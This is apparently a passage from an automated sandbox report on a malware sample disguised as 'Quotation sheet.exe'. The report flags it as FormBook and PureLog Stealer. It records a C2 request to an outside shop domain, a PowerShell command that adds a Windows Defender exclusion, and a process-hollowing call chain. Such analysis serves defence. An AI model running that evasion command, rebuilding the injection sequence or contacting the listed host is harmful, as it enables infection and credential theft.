                                                                                                                      Nov 26, 2024 11:19:32.899518013 CET265INData Raw: b0 3b 01 73 bd 9e 92 6c 42 e6 e0 e0 ca 25 d8 fd de fd e1 91 a2 00 c9 fa 39 17 cc 21 6e d0 0e 92 ff a2 30 b7 2c 79 ea ec e5 2a e3 35 e3 7d bb 4f 9e 6a 32 87 ba cf 1c 78 96 db e8 34 20 de 8a 33 9b d7 2b 63 d7 02 bc 42 99 da 6f 11 26 89 51 62 61 01
                                                                                                                      Data Ascii: ;slB%9!n0,y*5}Oj2x4 3+cBo&QbacVQwm4aeOv3`HU'SE4WK,qOIc%H;y#IG0`C|ERZT4'2(wp7GW{C-t7wC~rB~


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      32192.168.2.650021172.67.209.48802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:19:34.332317114 CET365OUTGET /huvt/?pXIDi=30N834GpBZU0OT&4nJt=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPYmXYZehu45VPp8MOy5WAu5nHK8ZcCMaFZ8i121M6teoDlc6/N3I= HTTP/1.1
                                                                                                                      Host: www.ampsamkok88.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Nov 26, 2024 11:19:35.497819901 CET1236INHTTP/1.1 404 Not Found
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:35 GMT
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2alaFL6cxn9%2FkQLp6qGrmekdiGbdymeMHa10MsqovVrLhl%2FGz7ACuOGXYlXRBaaNCZczSM8YEhsrxuGGtFrkxhe%2FJWyb7fR0Ni0br0YaJ1%2FI%2Bdv3zw3ifPwMZFh4AGRgPt31HEsDZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e8924195f8442b8-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1587&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=365&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Data Raw: 34 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b [TRUNCATED]
                                                                                                                      Data Ascii: 4e5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$param
                                                                                                                      Nov 26, 2024 11:19:35.498091936 CET806INData Raw: 73 3d 7b 72 3a 27 38 65 38 39 32 34 31 39 35 66 38 34 34 32 62 38 27 2c 74 3a 27 4d 54 63 7a 4d 6a 59 78 4e 6a 4d 33 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74
                                                                                                                      Data Ascii: s={r:'8e8924195f8442b8',t:'MTczMjYxNjM3NS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('h


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:05:16:31
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Users\user\Desktop\Quotation sheet.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\Quotation sheet.exe"
                                                                                                                      Imagebase:0xf90000
                                                                                                                      File size:795'136 bytes
                                                                                                                      MD5 hash:44AE4C9C2AB6623C0C1D04BB8B81871E
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2354177736.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2346401680.0000000004379000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:4
                                                                                                                      Start time:05:16:52
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe"
                                                                                                                      Imagebase:0xe00000
                                                                                                                      File size:433'152 bytes
                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:5
                                                                                                                      Start time:05:16:52
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:6
                                                                                                                      Start time:05:16:52
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                      Imagebase:0xbf0000
                                                                                                                      File size:2'625'616 bytes
                                                                                                                      MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:7
                                                                                                                      Start time:05:16:52
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                      Imagebase:0xbf0000
                                                                                                                      File size:2'625'616 bytes
                                                                                                                      MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2440846856.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2448995977.0000000006B70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:8
                                                                                                                      Start time:05:16:55
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe"
                                                                                                                      Imagebase:0x910000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3973027179.0000000004530000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:9
                                                                                                                      Start time:05:16:57
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\pcaui.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\SysWOW64\pcaui.exe"
                                                                                                                      Imagebase:0x4f0000
                                                                                                                      File size:135'680 bytes
                                                                                                                      MD5 hash:A8F63C86DEF45A7E48E7F7DF158CFAA9
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3973205147.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3973266974.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:11
                                                                                                                      Start time:05:17:11
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe"
                                                                                                                      Imagebase:0x910000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3973090704.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:13
                                                                                                                      Start time:05:17:24
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                      Imagebase:0x7ff728280000
                                                                                                                      File size:676'768 bytes
                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:13.3%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:0%
                                                                                                                        Total number of Nodes:268
                                                                                                                        Total number of Limit Nodes:12
                                                                                                                        execution_graph 32740 78cbf28 32741 78cc0b3 32740->32741 32742 78cbf4e 32740->32742 32742->32741 32745 78cc1a8 PostMessageW 32742->32745 32747 78cc1a1 32742->32747 32746 78cc214 32745->32746 32746->32742 32748 78cc1a8 PostMessageW 32747->32748 32749 78cc214 32748->32749 32749->32742 32477 59df888 32483 59dca10 32477->32483 32481 59df8cb 32482 59df9d5 32492 59dca50 32483->32492 32497 59dca40 32483->32497 32484 59dca2e 32484->32481 32487 59dcad0 32484->32487 32489 59dcaf1 32487->32489 32488 59dcb06 32488->32482 32489->32488 32490 59db1a8 DrawTextExW 32489->32490 32491 59dcb71 32490->32491 32493 59dca81 32492->32493 32494 59dcaae 32493->32494 32495 59dcad0 DrawTextExW 32493->32495 32502 59dcac0 32493->32502 32494->32484 32495->32494 32499 59dca50 32497->32499 32498 59dcaae 32498->32484 32499->32498 32500 59dcad0 DrawTextExW 32499->32500 32501 59dcac0 DrawTextExW 32499->32501 32500->32498 32501->32498 32504 59dcad0 32502->32504 32503 59dcb06 32503->32494 32504->32503 32507 59db1a8 32504->32507 32506 59dcb71 32509 59db1b3 32507->32509 32508 59deb49 32508->32506 32509->32508 32513 59df6c0 32509->32513 32516 59df6b0 32509->32516 32510 59dec5c 32510->32506 32520 59de114 32513->32520 32517 59df6c0 32516->32517 32518 59de114 DrawTextExW 32517->32518 32519 59df6dd 32518->32519 32519->32510 32521 59df6f8 DrawTextExW 32520->32521 32523 59df6dd 32521->32523 32523->32510 32524 78c8e19 32529 78cac58 32524->32529 32546 78cac48 32524->32546 32563 78cacbe 32524->32563 32525 78c8e28 32530 78cac72 32529->32530 32531 78cac7a 32530->32531 32581 78cb130 32530->32581 32588 78cb474 32530->32588 32592 78cb3d4 32530->32592 32597 78cb35a 32530->32597 32602 78cb9fc 32530->32602 32606 78cb43c 32530->32606 32611 78cb6c3 32530->32611 32616 78cbaa7 32530->32616 32620 78cb285 32530->32620 32624 78cb4e4 32530->32624 32628 78cb324 32530->32628 32632 78cb4ca 32530->32632 32637 78cb529 32530->32637 32641 78cb593 32530->32641 32531->32525 32547 78cac72 32546->32547 32548 78cb529 2 API calls 32547->32548 32549 78cb4ca 2 API calls 32547->32549 32550 78cac7a 32547->32550 32551 78cb324 2 API calls 32547->32551 32552 78cb4e4 2 API calls 32547->32552 32553 78cb285 2 API calls 32547->32553 32554 78cbaa7 2 API calls 32547->32554 32555 78cb6c3 2 API calls 32547->32555 32556 78cb43c 2 API calls 32547->32556 32557 78cb9fc 2 API calls 32547->32557 32558 78cb35a 2 API calls 32547->32558 32559 78cb3d4 2 API calls 32547->32559 32560 78cb474 2 API calls 32547->32560 32561 78cb130 4 API calls 32547->32561 32562 78cb593 2 API calls 32547->32562 32548->32550 32549->32550 32550->32525 32551->32550 32552->32550 32553->32550 32554->32550 32555->32550 32556->32550 32557->32550 32558->32550 32559->32550 32560->32550 32561->32550 32562->32550 32564 78cac4c 32563->32564 32565 78cacc1 32563->32565 32566 78cb529 2 API calls 32564->32566 32567 78cb4ca 2 API calls 32564->32567 32568 78cac7a 32564->32568 32569 78cb324 2 API calls 32564->32569 32570 78cb4e4 2 API calls 32564->32570 32571 78cb285 2 API calls 32564->32571 32572 78cbaa7 2 API calls 32564->32572 32573 78cb6c3 2 API calls 32564->32573 32574 78cb43c 2 API calls 32564->32574 32575 78cb9fc 2 API calls 32564->32575 32576 78cb35a 2 API calls 32564->32576 32577 78cb3d4 2 API calls 32564->32577 32578 78cb474 2 API calls 32564->32578 32579 78cb130 4 API calls 32564->32579 32580 78cb593 2 API calls 32564->32580 32565->32525 32566->32568 32567->32568 32568->32525 32569->32568 32570->32568 32571->32568 32572->32568 32573->32568 32574->32568 32575->32568 32576->32568 32577->32568 32578->32568 32579->32568 32580->32568 32582 78cb136 32581->32582 32646 78c882f 32582->32646 32650 78c8838 32582->32650 32589 78cb493 32588->32589 32654 78c84e8 32589->32654 32659 78c84f0 32589->32659 32593 78cb3da 32592->32593 32594 78cb885 32593->32594 32663 78c8698 32593->32663 32667 78c86a0 32593->32667 32594->32531 32598 78cb360 32597->32598 32671 78c7f5e 32598->32671 32675 78c7f37 32598->32675 32599 78cb21a 32599->32531 32679 78c7fd8 32602->32679 32683 78c7fe0 32602->32683 32603 78cb5cc 32603->32602 32607 78cb371 32606->32607 32608 78cb21a 32606->32608 32609 78c7f5e ResumeThread 32607->32609 32610 78c7f37 ResumeThread 32607->32610 32608->32531 32609->32608 32610->32608 32612 78cb6cc 32611->32612 32687 78c85a8 32612->32687 32691 78c85b0 32612->32691 32613 78cbb43 32617 78cb5cc 32616->32617 32618 78c7fd8 Wow64SetThreadContext 32617->32618 32619 78c7fe0 Wow64SetThreadContext 32617->32619 32618->32617 32619->32617 32622 78c85a8 WriteProcessMemory 32620->32622 32623 78c85b0 WriteProcessMemory 32620->32623 32621 78cb2b3 32621->32531 32622->32621 32623->32621 32626 78c7fd8 Wow64SetThreadContext 32624->32626 32627 78c7fe0 Wow64SetThreadContext 32624->32627 32625 78cb4fe 32626->32625 32627->32625 32629 78cb33b 32628->32629 32630 78c84e8 VirtualAllocEx 32629->32630 32631 78c84f0 VirtualAllocEx 32629->32631 32630->32629 32631->32629 32633 78cb4d7 32632->32633 32635 78c85a8 WriteProcessMemory 32633->32635 32636 78c85b0 WriteProcessMemory 32633->32636 32634 78cb631 32635->32634 32636->32634 32638 78cb481 32637->32638 32639 78c84e8 VirtualAllocEx 32638->32639 32640 78c84f0 VirtualAllocEx 32638->32640 32639->32638 32640->32638 32643 78cb3eb 32641->32643 32642 78cb885 32642->32531 32643->32642 32644 78c8698 ReadProcessMemory 32643->32644 32645 78c86a0 ReadProcessMemory 32643->32645 32644->32643 32645->32643 32647 78c88c1 CreateProcessA 32646->32647 32649 78c8a83 32647->32649 32651 78c88c1 CreateProcessA 32650->32651 32653 78c8a83 32651->32653 32655 78c84eb VirtualAllocEx 32654->32655 32656 78c8495 32654->32656 32658 78c856d 32655->32658 32656->32589 32658->32589 32660 78c8530 VirtualAllocEx 32659->32660 32662 78c856d 32660->32662 32662->32589 32664 78c86eb ReadProcessMemory 32663->32664 32666 78c872f 32664->32666 32666->32593 32668 78c86eb ReadProcessMemory 32667->32668 32670 78c872f 32668->32670 32670->32593 32672 78c7f70 ResumeThread 32671->32672 32674 78c7fa1 32672->32674 32674->32599 32676 78c7f5e ResumeThread 32675->32676 32678 78c7fa1 32676->32678 32678->32599 32680 78c7fe0 Wow64SetThreadContext 32679->32680 32682 78c806d 32680->32682 32682->32603 32684 78c8025 Wow64SetThreadContext 32683->32684 32686 78c806d 32684->32686 32686->32603 32688 78c85b0 WriteProcessMemory 32687->32688 32690 78c864f 32688->32690 32690->32613 32692 78c85f8 WriteProcessMemory 32691->32692 32694 78c864f 32692->32694 32694->32613 32750 59d51b8 32752 59d51e6 32750->32752 32751 59d5271 32752->32751 32754 59d4e78 32752->32754 32756 59d4e83 32754->32756 32755 59d5378 32755->32751 32756->32755 32758 59d4ea8 32756->32758 32759 59d54c0 SetTimer 32758->32759 32760 59d552c 32759->32760 32760->32755 32768 59db968 32772 59db990 32768->32772 32776 59db9a0 32768->32776 32769 59db987 32773 59db9a6 32772->32773 32780 59db9d9 32773->32780 32774 59db9ce 32774->32769 32777 59db9a9 32776->32777 32779 59db9d9 DrawTextExW 32777->32779 32778 59db9ce 32778->32769 32779->32778 32781 59dba12 32780->32781 32782 59dba23 32780->32782 32781->32774 32783 59dbab1 32782->32783 32786 59dbd10 32782->32786 32791 59dbd00 32782->32791 32783->32774 32788 59dbd38 32786->32788 32787 59dbe3e 32787->32781 32788->32787 32796 59dc598 32788->32796 32801 59dc5a8 32788->32801 32792 59dbd38 32791->32792 32793 59dbe3e 32792->32793 32794 59dc598 DrawTextExW 32792->32794 32795 59dc5a8 DrawTextExW 32792->32795 32793->32781 32794->32793 32795->32793 32797 59dc5a8 32796->32797 32799 59dca10 DrawTextExW 32797->32799 32806 59dca00 32797->32806 32798 59dc634 32798->32787 32799->32798 32802 59dc5be 32801->32802 32804 59dca10 DrawTextExW 32802->32804 32805 59dca00 DrawTextExW 32802->32805 32803 59dc634 32803->32787 32804->32803 32805->32803 32807 59dca10 32806->32807 32809 59dca50 DrawTextExW 32807->32809 32810 59dca40 DrawTextExW 32807->32810 32808 59dca2e 32808->32798 32809->32808 32810->32808 32695 59d5440 32696 59d544d 32695->32696 32697 59d5468 32695->32697 32697->32696 32700 59d4eb4 32697->32700 32699 59d5479 32701 59d4ebf 32700->32701 32704 59d4ef4 32701->32704 32703 59d5795 32703->32699 32705 59d4eff 32704->32705 32706 59d5901 GetCurrentThreadId 32705->32706 32707 59d592b 32705->32707 32706->32707 32707->32703 32811 59d5560 32814 59d558d 32811->32814 32812 59d55dc 32812->32812 32814->32812 32815 59d4ed4 32814->32815 32816 59d4edf 32815->32816 32817 59d4eb4 GetCurrentThreadId 32816->32817 32818 59d573c 32817->32818 32819 59d4e78 SetTimer 32818->32819 32820 59d5745 32819->32820 32820->32812 32708 78c5453 32709 78c546c 32708->32709 32720 78c7b2f 32709->32720 32724 78c7b40 32709->32724 32728 78c78d1 32709->32728 32732 78c78e0 32709->32732 32710 78c541a 32715 78c7b2f ResumeThread 32710->32715 32716 78c55cb 32710->32716 32717 78c7b40 ResumeThread 32710->32717 32718 78c78e0 ResumeThread 32710->32718 32719 78c78d1 ResumeThread 32710->32719 32715->32716 32717->32716 32718->32716 32719->32716 32721 78c7b73 32720->32721 32722 78c7be1 32721->32722 32736 78c7ecb 32721->32736 32722->32710 32725 78c7b73 32724->32725 32726 78c7be1 32725->32726 32727 78c7ecb ResumeThread 32725->32727 32726->32710 32727->32726 32730 78c78e0 32728->32730 32729 78c798e 32729->32710 32730->32729 32731 78c7ecb ResumeThread 32730->32731 32731->32729 32733 78c78f8 32732->32733 32734 78c798e 32733->32734 32735 78c7ecb ResumeThread 32733->32735 32734->32710 32735->32734 32737 78c7f43 32736->32737 32738 78c7ed2 32736->32738 32737->32738 32739 78c7f5e ResumeThread 32737->32739 32738->32722 32761 78c55e3 32762 78c5420 32761->32762 32763 78c55cb 32762->32763 32764 78c7b2f ResumeThread 32762->32764 32765 78c7b40 ResumeThread 32762->32765 32766 78c78e0 ResumeThread 32762->32766 32767 78c78d1 ResumeThread 32762->32767 32764->32763 32765->32763 32766->32763 32767->32763

                                                                                                                        Executed Functions

                                                                                                                        Function 094DAC70 Relevance: 2.3, Strings: 1, Instructions: 1022COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 94dac70-94dac91 1 94dac98-94dad84 0->1 2 94dac93 0->2 5 94db5ac-94db5d4 1->5 6 94dad8a-94daedb 1->6 2->1 9 94dbcb1-94dbcba 5->9 50 94db57a-94db5aa 6->50 51 94daee1-94daf3c 6->51 10 94dbcc0-94dbcd7 9->10 11 94db5e2-94db5eb 9->11 13 94db5ed 11->13 14 94db5f2-94db6d3 11->14 13->14 31 94db6d9-94db6e6 14->31 32 94db6e8-94db6f4 31->32 33 94db710 31->33 36 94db6fe-94db704 32->36 37 94db6f6-94db6fc 32->37 35 94db716-94db736 33->35 42 94db738-94db791 35->42 43 94db796-94db80c 35->43 38 94db70e 36->38 37->38 38->35 56 94dbcae 42->56 61 94db80e-94db85f 43->61 62 94db861-94db8a4 call 94dac20 43->62 50->5 58 94daf3e 51->58 59 94daf41-94daf4c 51->59 56->9 58->59 63 94db490-94db496 59->63 91 94db8af-94db8b5 61->91 62->91 64 94db49c-94db519 63->64 65 94daf51-94daf6f 63->65 108 94db566-94db56c 64->108 67 94dafc6-94dafdb 65->67 68 94daf71-94daf75 65->68 75 94dafdd 67->75 76 94dafe2-94daff8 67->76 68->67 72 94daf77-94daf82 68->72 77 94dafb8-94dafbe 72->77 75->76 80 94dafff-94db016 76->80 81 94daffa 76->81 85 94daf84-94daf88 77->85 86 94dafc0-94dafc1 77->86 82 94db01d-94db033 80->82 83 94db018 80->83 81->80 89 94db03a-94db041 82->89 90 94db035 82->90 83->82 87 94daf8e-94dafa6 85->87 88 94daf8a 85->88 92 94db044-94db0b5 86->92 95 94dafad-94dafb5 87->95 96 94dafa8 87->96 88->87 89->92 90->89 97 94db90c-94db918 91->97 98 94db0cb-94db243 92->98 99 94db0b7 92->99 95->77 96->95 101 94db91a-94db9a2 97->101 102 94db8b7-94db8d9 97->102 109 94db259-94db394 98->109 110 94db245 98->110 99->98 100 94db0b9-94db0c5 99->100 100->98 131 94dbb23-94dbb2c 101->131 104 94db8db 102->104 105 94db8e0-94db909 102->105 104->105 105->97 111 94db56e 108->111 112 94db51b-94db563 108->112 121 94db3f8-94db40d 109->121 122 94db396-94db39a 109->122 110->109 114 94db247-94db253 110->114 111->50 112->108 114->109 126 94db40f 121->126 127 94db414-94db435 121->127 122->121 124 94db39c-94db3ab 122->124 130 94db3ea-94db3f0 124->130 126->127 128 94db43c-94db45b 127->128 129 94db437 127->129 135 94db45d 128->135 136 94db462-94db482 128->136 129->128 137 94db3ad-94db3b1 130->137 138 94db3f2-94db3f3 130->138 133 94db9a7-94db9bc 131->133 134 94dbb32-94dbb8d 131->134 141 94db9be 133->141 142 94db9c5-94dbb11 133->142 160 94dbb8f-94dbbc2 134->160 161 94dbbc4-94dbbee 134->161 135->136 143 94db489 136->143 144 94db484 136->144 139 94db3bb-94db3dc 137->139 140 94db3b3-94db3b7 137->140 145 94db48d 138->145 147 94db3de 139->147 148 94db3e3-94db3e7 139->148 140->139 141->142 149 94dba0e-94dba4e 141->149 150 94dba98-94dbad8 141->150 151 94db9cb-94dba09 141->151 152 94dba53-94dba93 141->152 162 94dbb1d 142->162 143->145 144->143 145->63 147->148 148->130 149->162 150->162 151->162 152->162 169 94dbbf7-94dbca7 160->169 161->169 162->131 169->56
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: <ov!
                                                                                                                        • API String ID: 0-3980319286
                                                                                                                        • Opcode ID: c6fb7eec4dde91fcf2ce39959acdb636351ef7b36d2882f13aedfba366e8712c
                                                                                                                        • Instruction ID: 644ce23107ae4f5b4e35240bf321892a74614d1fbe89b6e0b6fcf25f30fd25d7
                                                                                                                        • Opcode Fuzzy Hash: c6fb7eec4dde91fcf2ce39959acdb636351ef7b36d2882f13aedfba366e8712c
